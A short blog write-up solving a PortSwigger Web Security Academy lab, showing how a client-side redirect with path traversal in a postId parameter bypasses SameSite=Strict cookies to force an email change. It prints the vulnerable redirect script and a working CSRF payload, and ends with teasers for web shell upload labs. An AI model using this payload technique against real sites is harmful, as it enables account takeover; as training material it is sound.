On this page
apsyleg1 min read
#portswigger #csrf #samesite #web-security

SameSite Strict Bypass via Client-Side Redirect

Lab

SameSite Strict bypass via client-side redirect · Practitioner

Solution

Given: the now-familiar email change form. Log in:

set-cookie: session=TkCuL6az98ZphhtL0tfC47tfHD8bAIRT; Secure; HttpOnly; SameSite=Strict

This time it's SameSite=Strict, and the previous GET-request trick won't work — the cookie won't be attached to the request. The hint points at a client-side redirect, let's find it.

Go to the site, open a post — there's a comment submission form:

postId=4&comment=1223&name=HUUU&email=r%40t.ru&website=https%3A%2F%2Flab.apsyleg.ru

Submit, a POST request fires, response 302. Redirect to /post/comment/confirmation?postId=4. And then, after 3 seconds, a client-side redirect to /post/4.

Look at the source of /confirmation. It loads the script /resources/js/commentConfirmationRedirect.js and calls:

<script>redirectOnConfirmation('/post');</script>

Script contents:

redirectOnConfirmation = (blogPath) => {
    setTimeout(() => {
        const url = new URL(window.location);
        const postId = url.searchParams.get("postId");
        window.location = blogPath + '/' + postId;
    }, 3000);
}

The injection could look like this (remembering method override):

../my-account/change-email?_method=POST&email=hacked@b.ru

And the URL itself:

/post/comment/confirmation?postId=../my-account/change-email?_method=POST&email=x@x.ru

"Missing parameter: 'submit'". Something's missing — go check how the legit password-change form works. Indeed, we also need to pass submit=1:

/post/comment/confirmation?postId=../my-account/change-email?_method=POST&email=x@x.ru&submit=1

Final payload:

<script>
    location = 'https://0a02006f03fc7e2f82b0a17e007f00dd.web-security-academy.net/post/comment/confirmation?postId=../my-account/change-email?_method=POST&email=x@x.ru&submit=1';
</script>

Didn't work — parameters after the first & got cut off. Then let's encode ? and &:

<script>
    location = 'https://0a02006f03fc7e2f82b0a17e007f00dd.web-security-academy.net/post/comment/confirmation?postId=../my-account/change-email%3f_method=POST%26email=x@x.ru%26submit=1';
</script>

Lab solved.

More in this category

Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)

.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.

Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)

Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.

Remote Code Execution via Web Shell Upload (PortSwigger Lab)

Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.